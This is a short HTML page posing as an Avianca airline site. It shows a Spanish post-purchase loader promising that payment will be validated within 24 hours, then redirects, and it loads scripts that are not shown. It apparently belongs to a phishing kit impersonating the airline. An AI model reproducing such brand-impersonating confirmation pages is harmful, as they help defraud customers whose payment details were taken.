<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Avianca - Find cheap tickets and flights</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="shortcut icon" href="./assets/favicon.png" t  ype="image/x-icon">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Red+Hat+Display:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&family=Red+Hat+Display:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./css/main.css">
    <link rel="stylesheet" href="./css/normalize.css">

    <!-- START -->
    <script src="./js/functions.js"></script>
</head>
<body class="sb-hidden">

    <!-- ON LOADER -->
    <div class="loader show " style="flex-direction: column;">
        <img class="" src="./assets/svg/plane-loader.gif">
        <p style="font-size: 22px;">¡Gracias por comprar en Avianca!</p>
        <h5 style="text-align: center;">Tu pago será validado en las próximas 24 horas, tus tiquetes y toda la información llegará a tu correo.</h5>
        <p>Redirigiendo...</p>
    </div>



    <!-- SCRIPTS -->
    <script src="./js/success.js"></script>
</body>
</html>